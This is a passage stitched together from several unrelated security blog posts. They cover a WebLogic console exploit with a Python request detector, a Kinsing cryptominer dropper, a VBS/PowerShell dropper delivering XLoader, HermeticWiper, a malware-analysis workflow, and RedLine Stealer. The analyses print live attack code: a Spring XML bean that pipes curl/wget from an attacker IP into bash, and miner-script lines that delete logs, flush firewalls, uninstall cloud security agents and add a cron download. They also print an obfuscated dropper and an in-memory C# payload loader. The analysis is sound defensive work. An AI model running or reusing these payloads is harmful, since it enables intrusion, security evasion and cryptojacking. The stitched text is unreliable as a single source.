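# Gadget class named in the request above; extend as new ones are reported.
GADGET_MARKERS = ("FileSystemXmlApplicationContext",)
# Package of the console's own handle classes (e.g. JMXHandle), treated as the
# benign baseline. Assumption: verify it against your own console traffic.
CONSOLE_HANDLE_PACKAGE = "com.bea.console.handles."
URL_RE = re.compile(r"https?://[^\s\"'()]+")


def fully_decode(s, max_rounds=3):
    """Percent-decode until the string stops changing and report how many
    rounds it took. The request above needs two (%252e -> %2e -> '.')."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(s)
        if decoded == s:
            break
        s, rounds = decoded, rounds + 1
    return s, rounds


def parse_raw_request(text):
    """Split a raw HTTP request into (method, target, body)."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.split("\n", 1)[0].split(" ", 2)
    return method, target, body.strip()


def inspect_request(method, target, body):
    """Flag a traversal out of /console/images/ that lands on console.portal
    and a 'handle' parameter naming a known gadget or a class outside the
    console handle package; collect any URL the handle references."""
    findings, urls = [], []
    decoded_target, rounds = fully_decode(target)
    path = decoded_target.split("?", 1)[0]
    if path.startswith("/console/images/") and ".." in path.split("/"):
        findings.append(f"traversal out of /console/images/ ({rounds}x percent-encoded) -> {path}")
    params = parse_qs(body, keep_blank_values=True) if method == "POST" else {}
    for handle in params.get("handle", []):
        handle_class = handle.split("(", 1)[0]
        if any(marker in handle for marker in GADGET_MARKERS):
            findings.append(f"known gadget class in handle: {handle_class}")
        elif not handle_class.startswith(CONSOLE_HANDLE_PACKAGE):
            findings.append(f"handle class outside {CONSOLE_HANDLE_PACKAGE}: {handle_class}")
        urls.extend(URL_RE.findall(handle))   # where the second stage is fetched from
    return {"suspicious": bool(findings), "findings": findings, "urls": urls}


# The request seen by the honeypot (headers trimmed, quotes straightened).
ATTACK_REQUEST = (
    "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\n"
    "Host: [redacted]:8080\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework."
    'context.support.FileSystemXmlApplicationContext("http://185.231.153.4/wb.xml")'
)

# Constructed benign console request for comparison (not from the honeypot).
BENIGN_REQUEST = (
    "POST /console/console.portal HTTP/1.1\n"
    "Host: [redacted]:8080\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "_nfpb=true&_pageLabel=DomainConfigGeneralPage&handle="
    'com.bea.console.handles.JMXHandle("com.bea:Name=mydomain,Type=Domain")'
)

if __name__ == "__main__":
    for name, raw in (("attack", ATTACK_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, inspect_request(*parse_raw_request(raw)))
```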

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>/bin/bash</value>
                <value>-c</value>
                <value><![CDATA[(curl -s 185.231.153.4/wb.sh||wget -q -O- 185.231.153.4/wb.sh)|bash]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

This leads us to wb.sh, downloaded from the same host. wb.sh is the actual script that installs the miner and disables the competition. I will not post the full script here as it is too long, only samples from various parts. The SHA256 hash of wb.sh is ea8727980efe4be07bcbaf300f7e7af354589b81c1bf7ca474a19ac9dcc01b1b.

It starts by disabling various typical security limits (note the chattr changes to the /tmp directories; that is not very common):

touch /tmp/zzza
ulimit -n 65535
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
ufw disable
iptables -F

[ and more… ]

Next, it uninstalls and kills the “aliyun-service.” Aliyun (Alibaba Cloud) installs various monitoring and security tools by default. The script downloads the vendor’s own uninstall scripts to remove them:

if ps aux | grep -i '[a]liyun'; then
  curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
  curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
  pkill aliyun-service
  rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  rm -rf /usr/local/aegis*
  systemctl stop aliyun.service
  systemctl disable aliyun.service
  service bcm-agent stop
  yum remove bcm-agent -y
  apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
  /usr/local/qcloud/stargate/admin/uninstall.sh
  /usr/local/qcloud/YunJing/uninst.sh
  /usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi

Next, it starts to kill processes that connect to specific IP addresses. I am not sure about the significance of these IP addresses (185.71.65.238, 140.82.52.87, 34.81.218.76, 42.112.28.216, 207.38.87.6). For example:

netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %

It also kills processes connecting to various ports regardless of the IP (143, 2222, 3333, 3389, 4444, 5555, and more). As many miner scripts do, it has a long list of process names it kills, such as:

pkill -f .javae
pkill -f .syna
pkill -f .main
pkill -f xmm
pkill -f solr.sh

It appears to kill competing miners and some valid processes, maybe to free up CPU cycles for the miner or to eliminate competitors masquerading as a valid process. It even goes so far as to check if any miners are running inside docker:

docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %

Finally, we get to download the miner:

BIN_MD5="2c44b4e4706b8bd95d1866d7867efa0e"
BIN_DOWNLOAD_URL="http://185.231.153.4/kinsing"
BIN_DOWNLOAD_URL2="http://185.231.153.4/kinsing"
BIN_NAME="kinsing"

This malware is nothing new and is well known on VirusTotal [1].

The malware achieves persistence by adding a cron job:

echo "* * * * * $LDR http://185.191.32.198/wb.sh | sh > /dev/null 2>&1"

In summary:

Specifically, disabling the Alibaba Cloud monitoring tools is new to me. I didn’t see any other endpoint security tools disabled (sure, things like SELinux and such, but no AV tools). Maybe I missed some among the long list of “kill” commands. But essentially, this script is targeting Alibaba Cloud users and assuming the machine they are breaching is pretty much unused and nobody but Alibaba is monitoring it.

[1] https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


File sharing is a classic operation performed by many people on a daily basis. Besides the big players like Dropbox or the various *Drive services (“One”, “Google”, etc.), there are a lot of free alternatives that make it easy to share files with peers. Because, still today, many organizations do not provide an “official” (read: promoted, supported, and monitored) service, users are always looking for alternatives. There are plenty of tools available, like Lufi[1] or transfer.sh[2] (and many others). The sample that I spotted yesterday was delivered through the second one.

The initial payload was a gzip’d RAR archive (SHA256:949ce2559baa5021ac55523ece74c52bcf39b74d94352d9697b60594034c6dfc)

remnux@remnux:/MalwareZoo/20220323$ gzip -d -c Files.gz | file -
/dev/stdin: RAR archive data, v5
remnux@remnux:/MalwareZoo/20220323$ gzip -d Files.gz && unrar t Files

UNRAR 5.50 freeware Copyright (c) 1993-2017 Alexander Roshal

Testing archive Files

Testing COMPILLED LIST OF ITEMS.vbs OK
Testing Item’s Specification & Drawings.vbs OK
Testing Company’s Introduction.vbs OK
All OK

All three files in the archive are the same. Here is the (beautified) code:

KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDSKJDSKDDKJEKJDKJDJKDKJDSJKDS = "W"&"s"&"c"&"r"&"i"&CHR(80)&"t."&"s"&"h"&CHR(69)&"l"&"l"
Set HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD = CreateObject(KKJDSKJDJKDSDSDSJKDSKJDSKDSKDKJSDKJSKDSKDSJKDSJKDSKJDSKDDKJEKJDKJDJKDKJDSJKDS)
SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK = "PoWERsh"
HDFHKFDKHHKDFHKHDFHKK = "E"
GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK = ""+SJKHSKHSDKHHKSDSDKHSDKHHDSKDSHKHKDSDHKDSK+HDFHKFDKHHKDFHKHDFHKK+"LL -exeCutiO BYpASS -C i`Ex( N`eW-oB`jEct neT.We`BcLi`ENt ).dOwNloadSTrinG('hxxps://transfer[.]sh/get/z16it2/rraammm.ps1') "
HFDJHDFSHJDFSHDFHDSHFDSHFHFHSHFKFHKFHSFHKFSHKFHKFHFFHDSFSHDFHSDFFHSSFHD.Run(GHDSHGDHDSKHDSKHDSKHDSHKDSKHDSDSKHDKSHKDSKHDSKHSDHDSKHDSHKDSHK),0

Pretty simple, it fetches the next payload through a share on transfer.sh.
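The dropper's obfuscation is all string assembly: `"W"&"s"&CHR(80)` concatenation in the VBScript, then backtick-broken, mixed-case cmdlet names in the PowerShell command it runs. The script below is an added example (not from the diary) that resolves both layers statically, without executing anything; the sample it parses is the dropper above with its random variable names shortened to A, S, B, C, D.

```python
import re

# Tokens the dropper's string expressions are built from: "literal", CHR(n),
# a variable name, or the & / + concatenation operators.
TOKEN_RE = re.compile(r'"([^"]*)"|CHR\((\d+)\)|([A-Za-z_]\w*)|([&+])', re.IGNORECASE)
SET_RE = re.compile(r'^\s*Set\s+([A-Za-z_]\w*)\s*=\s*CreateObject\((.+)\)\s*$', re.IGNORECASE)
RUN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\.Run\((.+)\)\s*,\s*(\d+)\s*$', re.IGNORECASE)
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
# In command position a backtick before a letter or digit is a no-op escape.
# Inside double-quoted strings `n, `t etc. would be real escapes; this sample
# sidesteps that by single-quoting the URL.
BACKTICK_RE = re.compile(r"`(?=[A-Za-z0-9])")


def eval_vbs_string(expr, env):
    """Evaluate a VBScript expression made only of string literals, CHR(n)
    calls and variable references joined by & or +. Unknown names raise
    KeyError rather than guessing."""
    out = []
    for literal, chr_code, name, op in TOKEN_RE.findall(expr):
        if chr_code:
            out.append(chr(int(chr_code)))
        elif name:
            out.append(env[name])
        elif not op:
            out.append(literal)
    return "".join(out)


def deobfuscate_vbs(script):
    """Walk the script line by line, resolving assignments, CreateObject()
    targets and .Run() calls. Returns (env, objects, runs)."""
    env, objects, runs = {}, {}, []
    for line in script.splitlines():
        if m := SET_RE.match(line):
            objects[m.group(1)] = eval_vbs_string(m.group(2), env)
        elif m := RUN_RE.match(line):
            runs.append((objects.get(m.group(1), "<unknown object>"),
                         eval_vbs_string(m.group(2), env), int(m.group(3))))
        elif m := ASSIGN_RE.match(line):
            env[m.group(1)] = eval_vbs_string(m.group(2), env)
    return env, objects, runs


def normalize_powershell(command):
    """Strip no-op backtick escapes and fold case. PowerShell cmdlet names and
    parameter prefixes (-exeCutiO abbreviates -ExecutionPolicy) are
    case-insensitive, so the result is what actually executes."""
    return BACKTICK_RE.sub("", command).lower().strip()


def analyze(script):
    """Return what the dropper ends up doing: COM object, normalized command,
    whether the window is hidden (style 0) and every single-quoted URL."""
    _, _, runs = deobfuscate_vbs(script)
    results = []
    for com_object, command, window_style in runs:
        normalized = normalize_powershell(command)
        results.append({
            "com_object": com_object,
            "command": normalized,
            "hidden_window": window_style == 0,
            "urls": re.findall(r"'([^']+)'", normalized),
        })
    return results


# Constructed sample: the statements of the dropper above with the long random
# variable names shortened to A, S, B, C, D.
SAMPLE_VBS = r'''
A = "W"&"s"&"c"&"r"&"i"&CHR(80)&"t."&"s"&"h"&CHR(69)&"l"&"l"
Set S = CreateObject(A)
B = "PoWERsh"
C = "E"
D = ""+B+C+"LL -exeCutiO BYpASS -C i`Ex( N`eW-oB`jEct neT.We`BcLi`ENt ).dOwNloadSTrinG('hxxps://transfer[.]sh/get/z16it2/rraammm.ps1') "
S.Run(D),0
'''

if __name__ == "__main__":
    for result in analyze(SAMPLE_VBS):
        print(result)
```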

hxxps://transfer[.]sh/get/z16it2/rraammm.ps1

The PowerShell code is:

$whatever = "dXNpbmcgU3lzd … (stuff deleted) … b3NlKCk7fX19";
$dec = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($whatever));
Add-Type -TypeDefinition $dec;
$instance = New-Object SKWTFPdZCH.DpGVQhBvSm.HqEHXQYiIxCnIoaXttSHgHoMU;
$instance.HxQcKKablTACrmEGBODiYOGhW();

$whatever contains the C# source of the next stage, which downloads the PE into memory and executes it:

using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Threading;

namespace SKWTFPdZCH.DpGVQhBvSm
{
  public class HqEHXQYiIxCnIoaXttSHgHoMU
  {
    // URL of the final payload (sdr.exe)
    private const string VhuixZgiqqTTIkrGvgRwUtDFE = "hxxps://transfer[.]sh/get/ACEDn1/sdr.exe";
    private MemoryStream XaXaVkSGstrUmNTeLpgVnccuS = new MemoryStream();

    [STAThread]
    public void HxQcKKablTACrmEGBODiYOGhW()
    {
      gmrjNtqiFbYCZLoofQZiMGGJt();   // download
      imYCaeLWaNVtuIupBojHByURJ();   // load and run
    }

    // Load the downloaded image through the non-public nLoadImage method and
    // invoke its entry point, so nothing is written to disk.
    private void imYCaeLWaNVtuIupBojHByURJ()
    {
      byte[] buffer = XaXaVkSGstrUmNTeLpgVnccuS.ToArray();
      Assembly assembly = null;
      if (Environment.Version.Major >= 4)
      {
        MethodInfo method = Type.GetType("System.Reflection.RuntimeAssembly").GetMethod("nLoadImage", BindingFlags.NonPublic | BindingFlags.Static);
        assembly = (Assembly)method.Invoke(null, new object[] { buffer, null, null, null, false, false, null });
      }
      else
      {
        MethodInfo method = Type.GetType("System.Reflection.Assembly").GetMethod("nLoadImage", BindingFlags.NonPublic | BindingFlags.Static);
        assembly = (Assembly)method.Invoke(null, new object[] { buffer, null, null, null, false });
      }
      object[] args = new object[1];
      if (assembly.EntryPoint.GetParameters().Length == 0)
        args = null;
      assembly.EntryPoint.Invoke(null, args);
    }

    // Fetch the payload into the MemoryStream
    private void gmrjNtqiFbYCZLoofQZiMGGJt()
    {
      WebRequest request = WebRequest.Create(VhuixZgiqqTTIkrGvgRwUtDFE);
      WebResponse response = request.GetResponse();
      using (Stream web_stream = response.GetResponseStream())
      {
        byte[] buffer = new byte[8192];
        int read = 0;
        while ((read = web_stream.Read(buffer, 0, buffer.Length)) > 0)
        {
          XaXaVkSGstrUmNTeLpgVnccuS.Write(buffer, 0, read);
        }
      }
      response.Close();
    }
  }
}

The final payload (sdr.exe) is again downloaded from transfer.sh. It’s an XLoader[3] sample.

It could be interesting to hunt for such file-sharing services in your logs… From a security point of view, Lufi is nice because all encrypt/decrypt operations are performed on the client side and the server never sees the content of the shared files. However, this prevents files from being downloaded by headless clients. transfer.sh is pretty simple and is, therefore, a nice solution for attackers! This technique is attractive to attackers because they don’t have to compromise a website to drop their malicious content. Note that a Lufi instance could perfectly well be used in a phishing campaign (via a link in the mail).

I’m running my own instance of Lufi as a honeypot and keeping an eye on it but, until now, it was never abused…

[1] https://framagit.org/fiat-tux/hat-softwares/lufi
[2] https://transfer.sh
[3] https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.


Written by: Vikram Navali – Senior Technical Product Manager

As the Ukraine-Russia conflict is gathering attention from everyone worldwide, a massive data-wiping malware called HermeticWiper hit multiple organizations in Ukraine. According to ESET researchers, threat actors had been preparing for a couple of months before they could launch a full-fledged attack.

Background of the HermeticWiper Malware Attack

As per Cisco’s Threat advisory report, the deployment of the destructive HermeticWiper malware began on Feb. 23, 2022. HermeticWiper is a malware type that can erase all the data from a victim’s system. The research also revealed that the wiper abuses legitimate drivers from the EaseUS Partition Master software to corrupt data. The Wiper binary is signed using a code signing certificate issued to Hermetica Digital Ltd.

How Impactful is the HermeticWiper Malware?

This malware is quite impactful and different from other malware types: it destroys data and data recovery tools without leaving any attack traces.

The malware has two components designed for destruction: one that targets the Master Boot Record (MBR) and another targeting partitions.

The wiper process begins by gaining SeShutDownPrivilege (to shut down the endpoint once it’s wiped the drives) and SeBackupPrivilege (to retrieve file contents for files whose security descriptor does not grant such access).

The wiper corrupts the MBR for every physical drive, enumerates individual partitions, and corrupts the partition data after destroying the Volume Shadow Copy Service (VSS) and corrupting other files necessary for file system operations. It then initiates a reboot to complete the wipe.

The research also found that threat actors had already compromised the Active Directory (AD) infrastructure of one of the targeted Ukrainian organizations and dropped the wiper via a default group policy object (GPO). They had gathered information on Group Policy settings and identified paths for privilege escalation.

How Can Attivo Networks Solution Help?

Attivo Networks solutions offer advanced protection for Active Directory, identifying specific domain, computer, and user-level risks and detecting live attacks. The ADSecure solution prevents Active Directory compromise by concealing objects in AD and stopping attacks that target them. The ADAssessor solution helps identify vulnerabilities in Active Directory Group Policy Preferences and permissions that allow threat actors to perform privilege escalation. Additionally, the solution can deploy deceptive SYSVOL Group Policy Objects in the production AD infrastructure. The solution detects and raises high-fidelity alerts when an attacker collects GPO information to determine a potential attack path.

The EDN capabilities detect Indicators of Compromise (IoC) such as file deletion, shadow volumes deletion, etc., and prevent the malware from deleting backup files created using Windows Volume Shadow Copy Service (VSS).

Additionally, Attivo Networks provides simple and flexible deployment solutions to identify threats and remediate them quickly. For more information, please visit https://www.attivonetworks.com/solutions/threat-detection/active-directory-protection/. 

Sign up for free trial offers on Active Directory security assessments and continuous visibility to AD vulnerabilities.

Conclusion

In the current situation of the Ukraine crisis, it is crucial to understand how cyber security can play a more significant role in safeguarding digital information against malicious or accidental threats. Organizations must implement a defense-in-depth strategy and deploy cyber security solutions across several barriers to prevent malicious activity.

The post HermeticWiper: A New Data Wiper Malware Targeting Ukraine Systems appeared first on Attivo Networks.

Analyzing New Malware

In the ever-changing world of cybersecurity, new threats appear and evolve on a regular basis. Sharing information about them is an important part of fighting cybercrime and keeping people and organizations safe. To do so efficiently, being prepared will make the best use of your—and your team’s—time when analyzing an emerging threat.

In this blog, we cover various situations that researchers encounter when they need to publish their findings and provide some suggestions on how to approach them, along with a suggested workflow for approaching the analysis most efficiently. Finally, we apply this strategy to analyze a ransomware sample.


Efficient analysis is extremely important when investigating new malware.

Challenges and Solutions

When a new threat emerges, there are a few common challenges that researchers face during analysis. Here are a few ways to handle them so you can produce clear and purposeful findings.

Urgency

In many cases, there is a relatively narrow window of time in which to release the publication, if we want the topic to be hot and the corresponding material to be relevant.

The solution is to focus on the most important questions that need answers.

Who are the potential readers of the article? How will they benefit from reading it?
How will the time costs associated with each section compare to its benefits?

Beginning your work by answering these questions will help shape the material in the right direction and manage time properly.

Novelty

For many attacks that hit the news, the related malware may not yet have been analyzed by other researchers. This increases the amount of work required to understand all parts of the relevant functionality, as there is little to no information to use as a starting point.

To address this issue, it is worth remembering that in many cases, modern malware families and attacker groups already have some roots. Tracking these connections allows researchers to find previous iterations of similar projects and reduce the amount of time required to understand the malware’s functionality.

Complexity

The consequences of simple cyberattacks aren’t generally big enough to attract the attention of the public. What that means for researchers is that if something is worth writing an article about, it’s likely to be quite complex and therefore time-consuming to analyze.

The solution here might be to split the big task into smaller tasks. Apart from prioritizing based on the article’s focus, it also allows the analysis to be done by a group, with different people focusing on different parts of the functionality. Exchanging knowledge on a regular basis about what has already been covered will help the team to be efficient and not waste time analyzing the same parts multiple times.

Suggested Workflow

Here is a common workflow that should allow researchers to approach the analysis of new executable samples efficiently and effectively.

The second step, Behavioral Analysis, refers to the black-box-style analysis that generally involves executing a sample under various monitoring tools and in sandboxes. The Dynamic Analysis step refers to the use of a debugger to execute instructions.

Steps and actions:

1. Triage

Collect as much easily-accessible open information as possible. This can come from existing articles, public sandbox reports, or other vendors’ detections.

Check for the presence of high-entropy blocks, the import table (or syscalls) and strings to understand whether the sample is likely to be packed.

Check whether some official (non-malicious) packer was used, using packer detection tools.

2. Behavioral Analysis

Conduct this analysis if it is easy to restore the lab environment after execution.

It may not be necessary if good public sandbox reports are already available.

Keep in mind that, often, behavioral analysis doesn’t show the full picture.

It may not go as expected because of anti-RE techniques involved.

3. Unpacking – Optional

Not always needed; some malware developers prefer to rely on obfuscation alone.

For official packers, there are multiple existing unpacking tools and scripts already available.

Ideally, the unpacked sample should remain executable to make the dynamic analysis easy. Otherwise, get as much unpacked code and data as possible.

4. Static and Dynamic Analysis of the Actual Functionality

This step only becomes possible once the unpacking is done (if it was necessary).

Generally, strings and APIs give the maximum information and serve as important landmarks to facilitate navigation within the samples.

Keep the markup accurate: rename functions, create structures, define enums and leave comments where necessary.

Debugging is mainly needed to decrypt/decode/decompress code and data and resolve APIs. Static analysis is generally enough for the rest.

Applying the Workflow to Malware Analysis

Let’s take a look at a DarkSide ransomware sample, which we analyzed earlier this year: 0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9

Step 1: Triage

At the time of analysis, the sample had already been uploaded to VirusTotal, so all community members could see the AV vendors' detections as well as the sandbox logs in the Behavior tab. Note that VirusTotal now integrates multiple sandboxes, so try a few to find a good report.

Multiple sandbox options on VirusTotal.

A quick look at the sample in a hex editor reveals a high-entropy block at the end. It could be several things: the next-stage payload or another module, a blob containing encrypted strings or configuration, and so on. Static analysis will be required to find out.

A high-entropy block.

There are practically no meaningful strings or APIs:

Very few entries in the import table.

This is a strong indicator that the sample is obfuscated, with APIs resolved dynamically and strings encrypted. Running a packer detection tool (PEiD with community signatures) confirms that there is no sign of a public packer being used here.

PEiD did not identify any known packers.
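Step 1 rests on two quick checks that need no disassembler: where the entropy is high and which strings are visible. The script below is an added example, not code from the Nozomi Networks post or its tooling. It implements both checks with the Python standard library and runs them over a constructed 2 KiB stand-in for an executable (a low-entropy header with two import-looking strings and NOP padding, followed by seeded pseudo-random bytes standing in for an encrypted blob at the end of the file). The 512-byte window and the 7.0 bits/byte threshold are assumed heuristics, not fixed rules.

```python
"""Triage helpers: locate high-entropy regions and list printable strings.

Added example for the triage step; not code from the Nozomi Networks post.
Window size, the 7.0 bits/byte threshold and the sample bytes are assumptions.
"""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of `data` in bits per byte (0.0 for constant, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_blocks(data: bytes, window: int = 512, threshold: float = 7.0):
    """Return merged (start, end) byte ranges whose windows reach the threshold.

    Encrypted or compressed blobs usually sit above ~7 bits/byte; plain x86 code,
    text and padding sit well below. The threshold is a heuristic, not a proof.
    """
    ranges = []
    for off in range(0, len(data), window):
        chunk = data[off:off + window]
        if shannon_entropy(chunk) >= threshold:
            end = off + len(chunk)
            if ranges and ranges[-1][1] == off:
                ranges[-1] = (ranges[-1][0], end)  # contiguous: extend previous range
            else:
                ranges.append((off, end))
    return ranges


def printable_strings(data: bytes, min_len: int = 5):
    """ASCII strings of at least `min_len` characters, like the `strings` tool."""
    out, cur = [], bytearray()
    for b in data + b"\x00":           # trailing sentinel flushes the last run
        if 0x20 <= b < 0x7F:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                out.append(cur.decode("ascii"))
            cur = bytearray()
    return out


def build_sample() -> bytes:
    """Constructed 2 KiB stand-in for an executable (not a real file).

    First 1 KiB: a DOS-stub-like header, two import-looking strings and NOP padding
    (low entropy). Second 1 KiB: seeded pseudo-random bytes standing in for an
    encrypted blob appended at the end of the file.
    """
    rng = random.Random(1337)          # fixed seed keeps the result reproducible
    head = (b"MZ" + b"\x00" * 62
            + b"This program cannot be run in DOS mode\x00"
            + b"kernel32.dll\x00GetProcAddress\x00")
    head += b"\x90" * (1024 - len(head))
    blob = bytes(rng.getrandbits(8) for _ in range(1024))
    return head + blob


def triage(data: bytes) -> dict:
    """Summary an analyst would glance at before deciding whether unpacking is needed."""
    blocks = high_entropy_blocks(data)
    return {
        "size": len(data),
        "high_entropy_blocks": blocks,
        "high_entropy_at_end": bool(blocks) and blocks[-1][1] == len(data),
        "strings": printable_strings(data),
    }


if __name__ == "__main__":
    for key, value in triage(build_sample()).items():
        print(f"{key}: {value}")
```

On the constructed sample the only high-entropy range is the trailing 1 KiB, which is exactly the "blob at the end" pattern described above; the random block will also throw up a few short accidental printable runs, which is why string output from packed regions should be read with suspicion. On a real PE, point `triage()` at the file bytes and cross-check the flagged ranges against section boundaries and the import table before concluding anything.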

Step 2: Behavioral Analysis

By the time the analysis began, the sample had already been submitted to various public sandboxes by other community members, so lots of information could be taken from there.

File activity in the public any.run report.

Step 3: Unpacking

Checking cross-references to the high-entropy block in the disassembler shows that it is not the next-stage payload: there is no control transfer to it or to related blocks. A quick look around the disassembly also confirms that the sample is obfuscated rather than packed, with multiple APIs resolved dynamically by hash and strings encrypted.

API resolution by hashes.

A call to the not-yet-resolved API.
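When a sample resolves APIs by hash, as above, the analyst-side counterpart is a lookup table from hash value to export name, so that the constants passed to the resolver can be labelled in the disassembly. The script below is an added example, not code from the Nozomi Networks post and not DarkSide's actual hashing routine: it uses the well-known ROR-13 export-name hash found in much shellcode as a stand-in, and a constructed export list instead of walking real DLL export tables. Once the real routine has been identified in the sample, only `ror13_hash` needs to be swapped out.

```python
"""Hash-to-name lookup for samples that resolve APIs by hash.

Added example for the unpacking/analysis steps; not code from the Nozomi Networks
post and not DarkSide's actual hashing routine. ROR-13 is used as a stand-in and
the export list is constructed rather than read from real DLLs.
"""


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Classic ROR-13 export-name hash: h = ror(h, 13) + byte over the ASCII name,
    without the terminating NUL. "LoadLibraryA" hashes to 0xEC0E4E8E."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h


# Constructed export list. A real tool would walk each DLL's export directory
# (e.g. with pefile) and feed every exported name through the same routine.
EXPORTS = {
    "kernel32.dll": ["LoadLibraryA", "GetProcAddress", "VirtualAlloc",
                     "CreateFileW", "ExitProcess"],
    "advapi32.dll": ["CryptAcquireContextA", "OpenProcessToken"],
}


def build_lookup(exports: dict, hash_fn=ror13_hash):
    """Map hash -> 'dll!Name'. Collisions are returned, not silently overwritten,
    because a wrong label in the disassembly is worse than no label."""
    table, collisions = {}, []
    for dll, names in exports.items():
        for name in names:
            h = hash_fn(name)
            label = f"{dll}!{name}"
            if h in table and table[h] != label:
                collisions.append((h, table[h], label))
            table.setdefault(h, label)
    return table, collisions


def resolve(hashes, table: dict):
    """Label the hash constants pulled from the disassembly. Unknowns keep their
    hex value so they stand out for follow-up (another DLL, or a different routine)."""
    return [table.get(h, f"unk_{h:08x}") for h in hashes]


if __name__ == "__main__":
    table, collisions = build_lookup(EXPORTS)
    # Hash constants as they would appear in the resolver's argument list;
    # 0xDEADBEEF is a deliberately unknown value.
    seen = [0xEC0E4E8E, ror13_hash("VirtualAlloc"), 0xDEADBEEF]
    for h, label in zip(seen, resolve(seen, table)):
        print(f"0x{h:08X} -> {label}")
    if collisions:
        print("collisions:", collisions)
```

The output of `resolve()` is what gets written back into the disassembler as a comment or a renamed pointer. Keeping unknown hashes visible rather than dropping them is deliberate: an unresolved constant usually means a DLL missing from the export list or a hashing detail (case folding, inclusion of the NUL, a seed) that was misread from the sample.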

Step 4: Static and Dynamic Analysis of the Actual Functionality

To navigate the disassembly efficiently, we need to make APIs and strings easily readable.

For APIs this is easy to achieve with dynamic analysis, because all the APIs are resolved in a single function. Letting that function run to completion gives us all the API addresses. To propagate their names to the pointers, use the standard renimp.idc script shipped with IDA Pro.

Resolved APIs' names.

This approach won't work for strings, which are decrypted ad hoc just before use rather than in a single place. Making them visible therefore requires scripting. In our DarkSide blog we already provided such a script, which attempts to find all the encrypted strings and decrypt them.

Before string decryption.

After string decryption.

That's it. With both strings and APIs visible, the only thing left is to carefully follow cross-references, keep the markup for the corresponding functions accurate, and describe all potentially interesting information (subject to the target audience) in the article.

Conclusion

Knowledge sharing is an important part of the cybersecurity field that allows us to quickly adapt to new threats and minimize their associated risks. By properly focusing our efforts, we can improve the quality of this process and make the world a safer place.

Extra Tips

Know your audience – the content of a technical blog post (and the questions it must answer) will be very different from a news article for the general public.
Consider teamwork to speed up the process – asking for help at an early stage increases the total time available for the analysis.
Have your templates ready – simple scripts to decrypt, decode or decompress data help avoid unnecessary delays.

Related Links

Blog: BlackMatter Ransomware Technical Analysis and Tools from Nozomi Networks Labs
Blog: Critical Log4shell (Apache Log4j) Zero-Day Attack Analysis
Blog: Colonial Pipeline Ransomware Attack: Revealing How DarkSide Works
Blog: Enhancing Threat Intelligence with the MITRE ATT&CK Framework

The post How to Analyze Malware for Technical Writing appeared first on Nozomi Networks.

Authors: Gorang Joshi & Chandan S – A credential-based attack occurs when an attacker steals credentials, escalates privileges, and compromises critical data. Credential theft is the first stage of a lateral-movement attack, and stopping the attack early in the process has a material impact on the attacker's success and on the damage incurred.

RedLine Stealer malware has been used extensively by attackers to harvest saved credentials from applications such as browsers and Windows Credential Manager. Several fake installers of well-known software have been reported dropping RedLine Stealer. With this tool it is remarkably easy to retrieve and save credentials from any application. Once dropped, the malware scans the affected endpoint for cryptocurrency wallets, browser login credentials, cookies, VPN client credentials and instant messaging applications. Stolen credentials give attackers access to a slew of other resources on the network, much of which can be reached without being detected.

